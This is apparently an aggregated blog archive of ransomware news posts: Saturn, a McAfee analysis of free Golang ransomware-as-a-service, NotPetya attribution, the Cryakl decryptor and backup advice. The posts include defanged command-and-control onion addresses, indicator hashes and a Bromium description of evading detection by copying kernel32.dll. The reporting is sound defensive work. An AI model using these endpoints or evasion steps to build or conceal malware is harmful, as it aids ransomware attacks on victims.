Category Archives: ransomware

Security Affairs: Researchers spotted a new malware in the wild, the Saturn Ransomware

Researchers at the MalwareHunterTeam spotted a new strain of ransomware called Saturn Ransomware, the name derives from the .saturn extension it appends to the name of the encrypted files.

Currently, the malware requests victims of $300 USD payment that doubles after 7 days.

Once infected a system, the Saturn Ransomware checks if it is running in a virtual environment and eventually it halts the execution to avoid being analyzed by researchers.

Then it performs a series of actions to make impossible for the victims restoring the encrypted files, it deletes shadow volume copies, disables Windows startup repair, and to clear the Windows backup catalog.

Below the command executed by the malicious code:


At this point, the Saturn ransomware is ready to encrypt files having certain file types.

The ransomware such as many other threats uses a Tor payment site that is reported in the ransom note dropped on the machine while the Saturn ransomware is encrypting the files.

“While encrypting the computer, Saturn Ransomware will drop ransom notes named #DECRYPT_MY_FILES#.html and #DECRYPT_MY_FILES#.txt and a key file named #KEY-[id].KEY in each folder that it encrypts a file. The key file is used to login to the TOR ransom site, while the ransom note contains brief information on what has happened to the victims files and a link to the TOR payment site at su34pwhpcafeiztt.onion.” wrote Larwrence Abrams from Bleeping Computer.

Saturn Ransomware

File encrypted by the Saturn Ransomware (Source Bleeping computer)

The Saturn ransomware also drops a #DECRYPT_MY_FILES#.vbs triggers an audio message to the victims, and it sets your Windows desktop background to  #DECRYPT_MY_FILES.BMP.

The authentication to TOR site is made by uploading the key file, then users will display the Saturn Decryptor page for the victim that includes detailed instructions.

Researchers are still analyzing the Saturn ransomware, even if it is being actively distributed, it is still unclear what distribution vector threat actors are using to spread it.

Further information, including the Indicators of compromise (IoCs), are available in the blog post published by Bleeping Computer.

Pierluigi Paganini

(Security Affairs – Saturn, cybercrime)

The post Researchers spotted a new malware in the wild, the Saturn Ransomware appeared first on Security Affairs.



Security Affairs

Researchers spotted a new malware in the wild, the Saturn Ransomware

Researchers at the MalwareHunterTeam spotted a new strain of ransomware called Saturn Ransomware, the name derives from the .saturn extension it appends to the name of the encrypted files.

Currently, the malware requests victims of $300 USD payment that doubles after 7 days.

Once infected a system, the Saturn Ransomware checks if it is running in a virtual environment and eventually it halts the execution to avoid being analyzed by researchers.

Then it performs a series of actions to make impossible for the victims restoring the encrypted files, it deletes shadow volume copies, disables Windows startup repair, and to clear the Windows backup catalog.

Below the command executed by the malicious code:


At this point, the Saturn ransomware is ready to encrypt files having certain file types.

The ransomware such as many other threats uses a Tor payment site that is reported in the ransom note dropped on the machine while the Saturn ransomware is encrypting the files.

“While encrypting the computer, Saturn Ransomware will drop ransom notes named #DECRYPT_MY_FILES#.html and #DECRYPT_MY_FILES#.txt and a key file named #KEY-[id].KEY in each folder that it encrypts a file. The key file is used to login to the TOR ransom site, while the ransom note contains brief information on what has happened to the victims files and a link to the TOR payment site at su34pwhpcafeiztt.onion.” wrote Larwrence Abrams from Bleeping Computer.

Saturn Ransomware

File encrypted by the Saturn Ransomware (Source Bleeping computer)

The Saturn ransomware also drops a #DECRYPT_MY_FILES#.vbs triggers an audio message to the victims, and it sets your Windows desktop background to  #DECRYPT_MY_FILES.BMP.

The authentication to TOR site is made by uploading the key file, then users will display the Saturn Decryptor page for the victim that includes detailed instructions.

Researchers are still analyzing the Saturn ransomware, even if it is being actively distributed, it is still unclear what distribution vector threat actors are using to spread it.

Further information, including the Indicators of compromise (IoCs), are available in the blog post published by Bleeping Computer.

Pierluigi Paganini

(Security Affairs – Saturn, cybercrime)

The post Researchers spotted a new malware in the wild, the Saturn Ransomware appeared first on Security Affairs.

Free Ransomware Available on Dark Web

The McAfee Advanced Threat Research team recently analyzed a ransomware-as-a-service threat that is available for free and without registration. This malware was first seen in July 2017 with the extension .shifr. It has now appeared in recent detections with the extension .cypher.

Ransomware-as-a-Service

Ransomware-as-a-service is a cybercrime economic model that allows malware developers to earn money for their creations without the need to distribute their threats. Nontechnical criminals buy their wares and launch the infections, while paying the developers a percentage of their take. The developers run relatively few risks, and their customers do most of the work.

Some ransomware-as-a-service, such as RaaSberry, use subscriptions while others require registration to gain access to the ransomware. The ransomware developer hosts a service on the “dark web” that allows any buyer to create and modify the malware. For example, the buyer can add custom ransom notes and the amount of the payment. More advanced services offer features such as evasion techniques to avoid detection and analysis. The service can also offer a control server with an administration panel to manage each victim. This system is convenient for both the developer, who makes money by selling malware, and for buyers, who gain ready-to-deploy ransomware without needing any specific coding knowledge.

The underground economy behind this service is well organized, effectively offering a cybercrime infrastructure. Basically, the ransomware is available on a website. The buyer sets up the ransomware by adding a wallet address. The ransomware is then available to download. The buyer just needs to customize and spread the malware. When a victim pays the ransom, a percentage is delivered both to the buyer and to the malware coder.

 

The ransomware is available on the TOR network at hxxp://kdvm5fd6tn6jsbwh.onion. A web page guides buyers through the configuration process.

On the configuration page, a generic XMPP address suggests we may have found a demo version of the ransomware.

On the page, the buyer need only to add a Bitcoin wallet address and the amount of the ransom. Once that is done, the malware is generated and can be downloaded. With this malware, the developer earns a 10% commission on every payment. Now let’s look at the malware sample.

Dynamic Analysis 

When the malware launches on the victim’s system, it checks for an Internet connection. If there is none, it exits the process. Otherwise, it contacts the following addresses to download the encryption key:

Once the file is running, it creates several files on the system:

  • Encryption_key: the RSA key encrypted in AES
  • Lock_file: an indicator that the system is encrypted
  • Uuid_file: a reference for the infected machine. A TOR address is generated with this ID.

The encryption key is downloaded from hxxps://kdvm5fd6tn6jsbwh.onion.to/new_c/xmKksHw53W433lmvNsdzGxqWLcPLA44Dyna.

The ransom note is created on the desktop.

The file “HOW_TO_DECRYPT_FILES.html” gives a link to the TOR network.

Once the files are encrypted, the ransom note is displayed in HTML and points to the TOR site hxxp://kdvm5fd6tn6jsbwh.onion/ with the ID of the infected machine.

Allegedly after payment, the victim can download the file decrypter.exe and unlock encrypted files, which have the extension .cypher.

The malware encrypts the following file extensions:

The targeted extensions include many picture and photography files related to Canon, Kodak, Sony, and others. There are also extensions for AutoCAD, Autodesk projects, scalable vector images, and Microsoft Office files. These files are mostly used by designers, photographers, architect—and many others.

Digging Deeper

The malware runs on 64-bit systems and is coded in Golang (“Go language,” from Google), a programming language similar to C with some improvements in error management. It is not common to find malware using Golang, although this is not the first time that we have analyzed such malware. This threat is pretty big compared with most other malware, larger than 5.5MB. The file size can make analysis more difficult and can also help evade hardcoded antimalware file-inspection sizes.

Reverse engineering in Golang is a bit different than other languages. Golang binaries are usually bigger than other executables. (By default, the compiler statically links the program’s libraries, resulting a bigger file.)

A drawback for attackers is that such big binaries can be easily detected on a corporate network. Large files are “noisier” and may appear suspicious when arriving from an external source. They can also be less convenient for attackers to deal with because they can make the infection process more difficult.

The first interesting function to analyze in a Golang binary is the “main_main.” The malware starts by gathering environment variables. It then checks whether the file “lock_file” exists in the directory C:\Users\<username>\AppData\Roaming.

The function “main_Exists” will check for the file. If it does not exist, the malware exits the process.

If the file does exist, the malware downloads the public key from the control server.

The malware contacts the address  hxxps://kdvm5fd6tn6jsbwh.onion/new_c/<nameofmalware>. The encryption public key is stored directly on the website.

This address is generated when the buyer creates the ransomware on the developer’s web page; thus the same malware encrypts files with the same public key.

The malware generates the AES key and tries to find any network share by querying the letters.

This function tries to find network shares:

Before a file is encrypted, the malware creates another file in C:\Users\<username>\AppData\Roaming\uuid_file to use as a victim identifier.

The malware encrypts the files using AES and deletes them after encryption with the function “os.remove” to avoid any simple forensic recovery.

The decrypter, which can be downloaded, works in a similar way but it requests the private key that the victims must pay for at hxxps://kdvm5fd6tn6jsbwh.onion.to/get_privkey/math/big. The mechanism behind the encryption routine seems to be on the online server and the decryption key cannot be easily recovered.

The following information describes the decrypter.

Conclusion

Cybercrime-as-a-service is not new, yet it is now more widespread than ever. In this case, the malware is available for free but the ransomware developer earns a 10% fee from each victim who pays a ransom. The use of Golang is not common for malware. Most ransomware-as-a-service is not free, which could indicate this might be a demonstration version, or a proof of concept for future sale.

This malware is not advanced and was coded without evasion techniques, such as DGA, SSL for control, encryption, or even file compression. Looking at the targeted file extensions suggests the victims can range from general home or business users to the graphics industry. Although such malware is not difficult to analyze, it can be very destructive in a corporate environment.

Keep in mind that paying a ransom is no guarantee of receiving a decryption key. McAfee advises that you never pay a ransom. You can find further information and help on unlocking some ransomware threats at https://www.nomoreransom.org.

McAfee detects this threat as Ransomware-FPDS!0F8CCEE515B8.

 

Indicators of Compromise

Hashes:

  • cb73927aa749f88134ab7874b15df898c014a35d519469f59b1c85d32fa69357
  • 0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c

IP address:

  • hxxp://kdvm5fd6tn6jsbwh.onion

Files created:

  • C:\Users\<username>\AppData\Roaming\uuid_file
  • C:\Users\<username>\AppData\Roaming\lock_file
  • C:\Users\<username>\AppData\Roaming\encryption_key
  • C:\Users\< username >\Desktop\HOW_TO_DECRYPT_FILES.html

Encryption extension:

  • .cypher

References:

https://www.virustotal.com/en/file/0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c/analysis/

https://isc.sans.edu/forums/diary/Ransomware+as+a+Service/23277/

 

The post Free Ransomware Available on Dark Web appeared first on McAfee Blogs.

The State of Ransomware: Attacks Up, Payments Down as Firms Fight Back

Ransomware isn’t going away. As noted by Infosecurity Magazine, European small and midsize businesses (SMBs) paid out almost $100 million last year to recover encrypted files. Meanwhile, Malwarebytes tracked a 90 percent increase in the number of detected ransomware attacks.

But it’s not all bad news. According to a new report from Datto, the state of ransomware is shifting. More companies are reporting attacks and fewer are paying ransoms. It’s a standoff: Ransomware-makers are doubling down on new attacks even as enterprises push back on payment.

The Current State of Ransomware

The Datto report pointed out that 4.5 percent of European SMBs fell victim to malware between 2016 and 2017. More telling, 78 percent said they experienced “business-threatening downtime” because of these attacks. Meanwhile, 97 percent of respondents said that ransomware attacks were on the rise, with 22 percent reporting multiple attacks in a single day.

What’s more, attackers are both persistent and pernicious. Eleven percent of SMBs said persistent ransomware was used to attack systems more than once, while 31 percent reported that ransomware also infected backups, making the road to remediation much more difficult. Given these startling numbers, it’s easy to see why the current state of ransomware has companies concerned.

Breaking the Feedback Loop of Fear

The ramp up of ransomware threats has created a kind of feedback-loop culture. Companies know that they shouldn’t pay the ransom and should report the attack, but standard operating procedure has become the opposite: Pay quickly to decrypt files and keep the breach under wraps.

As noted by the Datto report, however, attitudes are changing. More businesses are now reporting attacks to authorities and supplying them with relevant data, while just 21 percent of SMBs opted to pay the ransom in 2017. That’s a solid choice, since 18 percent of firms that came up with the cash didn’t get their data back.

So what’s the best way to push back and put enterprises ahead of malware-makers? It starts with recognizing origin points. According to Tech Republic, the root causes of most successful ransomware infections are user error and phishing attacks. Basic security hygiene, solid antivirus solutions and robust security training go a long way toward taking the bite out of ransomware threats.

Meanwhile, security firms are actively researching ransomware decryption tools, ZDNet reported. The Belgian National Police and Kaspersky Lab recently released a free solution for the prolific Cryakl ransomware strain.

The biggest shift, however, comes at a corporate level. Given the ability of ransomware threats to infect any operating system and any platform at any time, organizations often take on the mantle of helpless victim inevitably compromised by bad actors.

As a result, the threat of ransomware becomes just as terrifying as the infection itself, forcing employees and IT professionals into an infinite loop of fear and frustration. With the rise of reporting, proven effectiveness of basic security training and ongoing work by security experts, however, the state of ransomware becomes a driving force for security adaptation rather than harbinger of IT apocalypse.

The post The State of Ransomware: Attacks Up, Payments Down as Firms Fight Back appeared first on Security Intelligence.

Why the cyber threat landscape could grow under GDPR

The General Data Protection Regulation (GDPR) is only 3 short months away, with the incoming regulation seeing businesses across Europe and beyond bolster their cyber security in an effort to

The post Why the cyber threat landscape could grow under GDPR appeared first on The Cyber Security Place.

What the UK Knows: Five Things That Link NotPetya to Russia

The UK’s Foreign Office Minister Lord Ahmad said that the UK Government believes Russia was responsible for the destructive NotPetya cyber-attack of June 2017. How can they be sure? We look at five, strong clues pointing back to the Kremlin. The government of the United Kingdom has formally attributed the June 2017 NotPetya wiper attacks to...

Read the whole entry... »

Related Stories

UK Foreign Office Minister blames Russia for NotPetya massive ransomware attack

The United Kingdon’s Foreign and Commonwealth Office formally accuses the Russian cyber army of launching the massive NotPetya ransomware attack.

The UK Government formally accuses the Russian cyber army of launching the massive NotPetya ransomware attack.

The United Kingdon’s Foreign and Commonwealth Office “attributed the NotPetya cyber-attack to the Russian Government.”

According to the UK, NotPetya was used to disrupt Ukrainian “financial, energy and government sector” targets, but it went out of control causing severe damages to companies worldwide.

notpetya

The shipping giant Maersk chair Jim Hagemann Snabe revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya the attack.

In August 2017 the company announced that it would incur hundreds of millions in U.S. dollar losses due to the ransomware massive attack.

The UK considers the attack an intolerable act and will not accept future similar offensives.

“Foreign Office Minister Lord Ahmad has today attributed the NotPetya cyber-attack to the Russian Government. The decision to publicly attribute this incident underlines the fact that the UK and its allies will not tolerate malicious cyber activity.” reads the official statement issued by the UK Government.

“The attack masqueraded as a criminal enterprise but its purpose was principally to disrupt. Primary targets were Ukrainian financial, energy and government sectors. Its indiscriminate design caused it to spread further, affecting other European and Russian business.”

Below the declaration of the Foreign Office Minister for Cyber Security Lord (Tariq) Ahmad of Wimbledon:

“The UK Government judges that the Russian Government, specifically the Russian military, was responsible for the destructive NotPetya cyber-attack of June 2017.

The attack showed a continued disregard for Ukrainian sovereignty. Its reckless release disrupted organisations across Europe costing hundreds of millions of pounds.

The Kremlin has positioned Russia in direct opposition to the West yet it doesn’t have to be that way. We call upon Russia to be the responsible member of the international community it claims to be rather then secretly trying to undermine it.

The United Kingdom is identifying, pursuing and responding to malicious cyber activity regardless of where it originates, imposing costs on those who would seek to do us harm. We are committed to strengthening coordinated international efforts to uphold a free, open, peaceful and secure cyberspace.”

According to Ukraine’s Secret Service (SBY), Russia orchestrated the NotPetya ransomware attack, going public with their accusations just days after the incident.

NotPetya wasn’t the last massive ransomware attack in order of time, in October Bad Rabbit

NotPetya was followed by the Bad Rabbit ransomware that in late October infected systems in many countries wordlwide, most of in East Europe, such as Ukraine and Russia.

Pierluigi Paganini

(Security Affairs – NotPetya, ransomware)

The post UK Foreign Office Minister blames Russia for NotPetya massive ransomware attack appeared first on Security Affairs.

Security Affairs: UK Foreign Office Minister blames Russia for NotPetya massive ransomware attack

The United Kingdon’s Foreign and Commonwealth Office formally accuses the Russian cyber army of launching the massive NotPetya ransomware attack.

The UK Government formally accuses the Russian cyber army of launching the massive NotPetya ransomware attack.

The United Kingdon’s Foreign and Commonwealth Office “attributed the NotPetya cyber-attack to the Russian Government.”

According to the UK, NotPetya was used to disrupt Ukrainian “financial, energy and government sector” targets, but it went out of control causing severe damages to companies worldwide.

notpetya

The shipping giant Maersk chair Jim Hagemann Snabe revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya the attack.

In August 2017 the company announced that it would incur hundreds of millions in U.S. dollar losses due to the ransomware massive attack.

The UK considers the attack an intolerable act and will not accept future similar offensives.

“Foreign Office Minister Lord Ahmad has today attributed the NotPetya cyber-attack to the Russian Government. The decision to publicly attribute this incident underlines the fact that the UK and its allies will not tolerate malicious cyber activity.” reads the official statement issued by the UK Government.

“The attack masqueraded as a criminal enterprise but its purpose was principally to disrupt. Primary targets were Ukrainian financial, energy and government sectors. Its indiscriminate design caused it to spread further, affecting other European and Russian business.”

Below the declaration of the Foreign Office Minister for Cyber Security Lord (Tariq) Ahmad of Wimbledon:

“The UK Government judges that the Russian Government, specifically the Russian military, was responsible for the destructive NotPetya cyber-attack of June 2017.

The attack showed a continued disregard for Ukrainian sovereignty. Its reckless release disrupted organisations across Europe costing hundreds of millions of pounds.

The Kremlin has positioned Russia in direct opposition to the West yet it doesn’t have to be that way. We call upon Russia to be the responsible member of the international community it claims to be rather then secretly trying to undermine it.

The United Kingdom is identifying, pursuing and responding to malicious cyber activity regardless of where it originates, imposing costs on those who would seek to do us harm. We are committed to strengthening coordinated international efforts to uphold a free, open, peaceful and secure cyberspace.”

According to Ukraine’s Secret Service (SBY), Russia orchestrated the NotPetya ransomware attack, going public with their accusations just days after the incident.

NotPetya wasn’t the last massive ransomware attack in order of time, in October Bad Rabbit

NotPetya was followed by the Bad Rabbit ransomware that in late October infected systems in many countries wordlwide, most of in East Europe, such as Ukraine and Russia.

Pierluigi Paganini

(Security Affairs – NotPetya, ransomware)

The post UK Foreign Office Minister blames Russia for NotPetya massive ransomware attack appeared first on Security Affairs.



Security Affairs

NotPetya/GoldenEye back in the spotlight: UK officially points finger to Kremlin for June 2017 cyberattack

2017 has already gone down as the worst year on record from a cybersecurity standpoint. But the world is still not over the two infamous attacks deployed by hackers in May (WannaCry) and June (NotPetya/Goldeneye) of last year, which together dealt billions of dollars’ worth of damages to victims worldwide.

After conducting scrupulous assessments in the wake of June’s NotPetya/GoldenEye pandemic, the UK’s cybersecurity watchdog claims it knows Russia was behind it. And it wants Russia to know it is not having it anymore.

A letter signed by the Foreign & Commonwealth Office, National Cyber Security Centre, and Lord Ahmad of Wimbledon reads:

“The UK’s National Cyber Security Centre assesses that the Russian military was almost certainly responsible for the destructive NotPetya cyber-attack of June 2017. Given this is the highest level of assessment and the broader context, the UK government has made the judgement that the Russian government was responsible for this cyber-attack.”

“The attack masqueraded as a criminal enterprise but its purpose was principally to disrupt. Primary targets were Ukrainian financial, energy and government sectors. Its indiscriminate design caused it to spread further, affecting other European and Russian business.”

Ahmad said the UK Government “judges” that the malware was crafted and subsequently deployed by none other than the Russian military, adding that “The attack showed a continued disregard for Ukrainian sovereignty. Its reckless release disrupted organisations across Europe costing hundreds of millions of pounds” – a figure already circulated by the media after victims released financial statements mentioning the losses incurred by the attack.

As avid readers might remember, NotPetya/ GoldenEye’s total financial damage was ultimately calculated at over 1 billion US Dollars.

“The Kremlin has positioned Russia in direct opposition to the West yet it doesn’t have to be that way,” Ahmad continues his denunciatory message. “… The United Kingdom is identifying, pursuing and responding to malicious cyber activity regardless of where it originates, imposing costs on those who would seek to do us harm.”

Most cybersecurity experts agree that NotPetya/GoldenEye was merely crafted to work like ransomware but was instead primarily aimed at destabilizing Ukraine – not necessarily to turn a profit for the attackers.

After hitting Ukraine, the malware spread to several other European countries (including the UK), disrupting international power distributors, pharmaceutical companies, banks, advertisers, law firms, public transport, even airports.

The UK is not at its first warning that it will respond accordingly when faced with such mischievousness. Eight months ago, the country’s defense secretary Sir Michael Fallon  threatened to deploy “air, land, sea or cyber space” attacks onto hackers caught infiltrating British government systems.

WeLiveSecurity: Android ransomware in 2017: Innovative infiltration and rougher extortion

Ransomware in 2017 saw users and businesses across the globe trying to cope with campaigns such as Petya and WannaCryptor. Not to be outdone, Android ransomware had a year full of innovative infiltration and rougher extortion as highlighted by the latest ESET research whitepaper.

The post Android ransomware in 2017: Innovative infiltration and rougher extortion appeared first on WeLiveSecurity



WeLiveSecurity

Android ransomware in 2017: Innovative infiltration and rougher extortion

Ransomware in 2017 saw users and businesses across the globe trying to cope with campaigns such as Petya and WannaCryptor. Not to be outdone, Android ransomware had a year full of innovative infiltration and rougher extortion as highlighted by the latest ESET research whitepaper.

The post Android ransomware in 2017: Innovative infiltration and rougher extortion appeared first on WeLiveSecurity

Poor patching, user education leave healthcare providers sitting ducks for cyber attacks

Despite the masses of highly sensitive data that healthcare companies manage, new analysis has warned that chronically poor endpoint security, weak patching practices and high exposure to social engineering make

The post Poor patching, user education leave healthcare providers sitting ducks for cyber attacks appeared first on The Cyber Security Place.

What online attacks will dominate the threat landscape this year?

This article will focus on three different and pressing issues that the IT security industry needs to be prepared for during 2018 – the increase of cyber threats via social

The post What online attacks will dominate the threat landscape this year? appeared first on The Cyber Security Place.

The State of Security: Ransomware – A Reminder for Healthcare Providers to Lock Down Their Environments

Ransomware attacks against healthcare providers aren’t new. In 2017, two crypto-malware infections affecting medical organizations made The State of Security’s top list of ransomware attacks for the year. The first involved an unknown strain that targeted Arkansas Oral & Facial Surgery Center, an incident which affected X-ray images, documents, and patient data related to recent […]… Read More

The post Ransomware – A Reminder for Healthcare Providers to Lock Down Their Environments appeared first on The State of Security.



The State of Security

Ransomware – A Reminder for Healthcare Providers to Lock Down Their Environments

Ransomware attacks against healthcare providers aren’t new. In 2017, two crypto-malware infections affecting medical organizations made The State of Security’s top list of ransomware attacks for the year. The first involved an unknown strain that targeted Arkansas Oral & Facial Surgery Center, an incident which affected X-ray images, documents, and patient data related to recent […]… Read More

The post Ransomware – A Reminder for Healthcare Providers to Lock Down Their Environments appeared first on The State of Security.

Bromium: Hackers Keep it Simple: Malware Evades Detection by Simply Copying a File

  • New malware technique evades detection by simply copying a file
  • We break it down step-by-step to show you how it works
  • Innovative hackers continue to deliver sophisticated malware that evades detection

The Bromium Lab is back to break down a recent outbreak of sneaky malware, shared with us by some of our customers who caught this in their isolated micro-VMs.

For decades, malware has tried to avoid detection in evermore cunning ways:

  • First, files became polymorphic so that simply checking files on disk wouldn’t work.
  • Then malware behavior became polymorphic too so that detection tools would struggle to spot the malware’s activity in the noise and chaos of typical PC operations.

Still, behavior analysis remains the main strategy for the detection-based security industry.

Watch application isolation in action: see Bromium contain malware.

Now, we are seeing a depressingly simple, obvious way to avoid this sort of detection: copy a file. To fully understand this latest approach, let me provide a quick primer on how detection-based security products work. If you’re already an expert, feel free to scroll down.

+++

In the normal operation of a PC, applications (such as Word) constantly make requests to the operating system (OS), and more specifically to the OS “kernel”—the most powerful part of the operating system.

Common requests would be:

  • Open that file
  • Display this picture on the screen
  • Play that sound
  • Etc, etc, all day long

 

Malware Evades Detection by Simply Copying a File

Any malware in a Word application will likely need to ask the kernel to do its evil bidding.

Malware Evades Detection by Simply Copying a File

So, the detection industry monitors all these requests from applications (like Word) into the kernel. They hope to spot a pattern of suspicious requests and alert you to malicious activity.

One way to detect suspicious activity is to intercept these requests as they pass through “kernel32.dll.” That’s a standard part of the Windows OS that allows normal applications (“user-space code”) to make requests into the kernel (“kernel-space”). Like this:

Malware Evades Detection by Simply Copying a File

Detection products aim to separate the wheat from the chaff and spot the pattern of odd behavior that would imply that something dubious is running within Word. Unfortunately for detection-based security, it’s mathematically impossible to do that with 100% correctness, but that’s another story. Read more about The Halting Problem.

+++

Returning to this particular flavor of malware, we see a rather simple, cunning way to bypass the detection products: It simply copies kernel32.dll.

Malware Evades Detection by Simply Copying a File

The copied version is identical, and so serves to relay requests from Word into the kernel in precisely the same way. However, the copy name is subtly different. Therefore, some products fail to detect the malware activity as it passes from Word to the kernel.

Once it can talk to the kernel, the malware can launch new processes to begin its reign of terror:

  • Does some process hollowing of “svchost.exe”
  • Installs Tor so it can create anonymous connections via the “dark web” to its command-and-control server
  • Sits and listens, awaiting instructions from its masters to encrypt your documents, steal your secrets, spy on your staff, or whatever else its commanders want it to do.

Malware Evades Detection by Simply Copying a File

Detection-based security is flawed.

There are always new ways for the malware authors to outsmart detection tools. In this example, Bromium’s detection engine identified the malware, but that’s not always the case. Bromium doesn’t claim to detect everything, nobody can. For our customers who shared this data with us, the malware played out exactly as the authors intended … but it did so in an isolated, micro-VM, and the malware was unable to harm or impact the host or the network.

On behalf of the Bromium Lab team, we look forward to capturing the next installment of malware in our micro-VMs, and, of course, sharing the details with you.

 

Get started today. Contact Bromium to request a demo.

The post Hackers Keep it Simple: Malware Evades Detection by Simply Copying a File appeared first on Bromium.





Bromium

The AVIEN Blog: Rapid ransomware spoofs IRS

Bleeping Computer, 12th February 2018: Rapid Ransomware Being Spread Using Fake IRS Malspam

“A new variant of Rapid Ransomware is currently being distributed using malspam that pretends to be from the Internal Revenue Service. First detected by Derek Knight, this campaign is a mixup of countries with the IRS being a U.S. entity, the send being a UK email address, and the spam attachment being in German.”

Much more information in Lawrence Abrams’ article.

David Harley



The AVIEN Blog

Ransomware costs European SMBs £71 million in downtime

Some businesses still decide to pay the ransom as they see it as a cheap way out.Ransomware costs European businesses £71 million in downtime, a new report by Datto argues.

The post Ransomware costs European SMBs £71 million in downtime appeared first on The Cyber Security Place.

Victims of the current version of the Cryakl ransomware can decrypt their files for free

Free decryption keys for the Cryakl ransomware were added to the free Rakhni Decryptor that could be downloaded on the NoMoreRansom website.

The Belgian Federal Police has located the command and control server used by a criminal organization behind the Cryakl ransomware. The server was located in an unspecified neighboring country, law enforcement seized it and shared the decryption keys found on the machine with the No More Ransom project.

“The Belgian Federal Police is releasing free decryption keys for the Cryakl ransomware today, after working in close cooperation with Kaspersky Lab. The keys were obtained during an ongoing investigation; by sharing the keys with No More Ransom the Belgian Federal Police becomes a new associated partner of the project – the second law enforcement agency after the Dutch National Police.” reads the statement published by the Europol.

“Led by the federal prosecutor’s office, the Belgian authorities seized this and other servers while forensic analysis worked to retrieve the decryption keys. Kaspersky Lab provided technical expertise to the Belgian federal prosecutor and has now added these keys to the No More Ransom portal on behalf of the Belgian federal police. This will allow victims to regain access to their encrypted files without having to pay to the criminals.”

The “exponential” rise in Ransomware threat represents a serious problem for users online and it is a profitable business for cyber criminals. The operation NO More Ransom is the response of the Europol of the growing threat.

Cryakl ransomware

Victims of Cryakl ransomware can recover encrypted files using the Rakhni Decryptor available for free from Kaspersky Lab or NoMoreRansom at the following URL.

The tool works with most versions of the Cryakl ransomware, but researchers at MalwareHunterTeam confirmed that it doesn’t work with versions newer than CL 1.4.0.

It has been estimated that the tool has helped more than 35,000 victims of ransomware to decrypt their files for free, an overall loss for crooks of over €10m.

“There are now 52 free decryption tools on www.nomoreransom.org, which can be used to decrypt 84 ransomware families. CryptXXX, CrySIS and Dharma are the most detected infections.” continues the statement.

The Belgian authorities are still investigating the case.

 

Pierluigi Paganini

(Security Affairs – Cryakl ransomware, cybercrime)

The post Victims of the current version of the Cryakl ransomware can decrypt their files for free appeared first on Security Affairs.

Advancing Ransomware Attacks and Creation of New Cyber Security Strategies

As ransomware is on the rise, the organisations are focusing too much on the anti-virus softwares rather than proactively forming strategies to deal with cyber-attacks which could pose as an indefinite threat to the users. Nevertheless one of the good advices to deal with this issue is the creation of the air-gaps, as through these it becomes quite easy to store and protect critical data. It even allows the offline storage of data. So, when a ransomware attack occurs, it should be possible to restore your data without much downtime – if any at all.

But it usually happens so that organisations more often than not find themselves taking one step forward and then one step back. As traditionally, the ransomware is more focused on backup programs and their associated storage but on the other hand it seems very keen on perpetually targeting the storage subsystems which has spurred organisations into having robust backup procedures in place to counter the attack if it gets through.

So in order for the organisations to be proactive it is recommended that they should resort to different ways to protecting data that allows it to be readily recovered whenever a ransomware attack, or some other cyber security issue, threatens to disrupt day-to-day business operations and activities.

Clive Longbottom, client services director at analyst firm Quocirca explains: “If your backup software can see the back-up, so can the ransomware. Therefore, it is a waste of time arguing about on-site v off-site – it comes down to how well air locked the source and target data locations are.”

However, to defend against any cyber-attack there needs to be several layers of defence which may or may not consist of a firewall, anti-virus software or backup. The last layer of defence that is to be used by the user though, must be the most robust of them all to stop any potential costly disruption in its track before it’s too late. So, anti-virus software must still play a key defensive role.

A ransomware attack is pretty brutal, warns Longbottom, “It requires a lot of CPU and disk activity. It should be possible for a system to pick up this type of activity and either block it completely, throttles it, or prevents it from accessing any storage system other than ones that are directly connected physically to the system.”

Now coming down to the traditional approach, it is often observed that data centres are in position in close proximity to each other in order to easily tackle the impact of latency, but for the fact they are all too often situated within the same circles of disruption increases the financial, operational and reputational risks associated with downtime.

Therefore there are a few certain tips that could allow the user to successfully migrate data to prevent ransomware attacks:
• The more layers you can add the better.
• User education.
• Update your Back-up regularly - it can be the last layer of defence.
• Have a copy off site – tape or cloud but don’t leave the drawbridge down.
• Planning of your backup process for your recovery requirement.

By following these one could successfully prevent cyber-attacks with ease and precision.

E Hacking News – Latest Hacker News and IT Security News: Advancing Ransomware Attacks and Creation of New Cyber Security Strategies

As ransomware is on the rise, the organisations are focusing too much on the anti-virus softwares rather than proactively forming strategies to deal with cyber-attacks which could pose as an indefinite threat to the users. Nevertheless one of the good advices to deal with this issue is the creation of the air-gaps, as through these it becomes quite easy to store and protect critical data. It even allows the offline storage of data. So, when a ransomware attack occurs, it should be possible to restore your data without much downtime – if any at all.

But it usually happens so that organisations more often than not find themselves taking one step forward and then one step back. As traditionally, the ransomware is more focused on backup programs and their associated storage but on the other hand it seems very keen on perpetually targeting the storage subsystems which has spurred organisations into having robust backup procedures in place to counter the attack if it gets through.

So in order for the organisations to be proactive it is recommended that they should resort to different ways to protecting data that allows it to be readily recovered whenever a ransomware attack, or some other cyber security issue, threatens to disrupt day-to-day business operations and activities.

Clive Longbottom, client services director at analyst firm Quocirca explains: “If your backup software can see the back-up, so can the ransomware. Therefore, it is a waste of time arguing about on-site v off-site – it comes down to how well air locked the source and target data locations are.”

However, to defend against any cyber-attack there needs to be several layers of defence which may or may not consist of a firewall, anti-virus software or backup. The last layer of defence that is to be used by the user though, must be the most robust of them all to stop any potential costly disruption in its track before it’s too late. So, anti-virus software must still play a key defensive role.

A ransomware attack is pretty brutal, warns Longbottom, “It requires a lot of CPU and disk activity. It should be possible for a system to pick up this type of activity and either block it completely, throttles it, or prevents it from accessing any storage system other than ones that are directly connected physically to the system.”

Now coming down to the traditional approach, it is often observed that data centres are in position in close proximity to each other in order to easily tackle the impact of latency, but for the fact they are all too often situated within the same circles of disruption increases the financial, operational and reputational risks associated with downtime.

Therefore there are a few certain tips that could allow the user to successfully migrate data to prevent ransomware attacks:

• The more layers you can add the better.
• User education.
• Update your Back-up regularly - it can be the last layer of defence.
• Have a copy off site – tape or cloud but don’t leave the drawbridge down.
• Planning of your backup process for your recovery requirement.
By following these one could successfully prevent cyber-attacks with ease and precision.




E Hacking News - Latest Hacker News and IT Security News

Kaspersky Lab official blog: Cryakl/Fantomas victims rescued by new decryptor

The No More Ransom project for assisting victims of ransomware has good news to report: The Belgian police, in cooperation with Kaspersky Lab, managed to obtain keys for recovering files encrypted with new versions of Cryakl ransomware, also known as Fantomas. The updated decryption tool is already available on the project’s website.

How to decrypt files encrypted by the Shade ransomware

What is Cryakl?

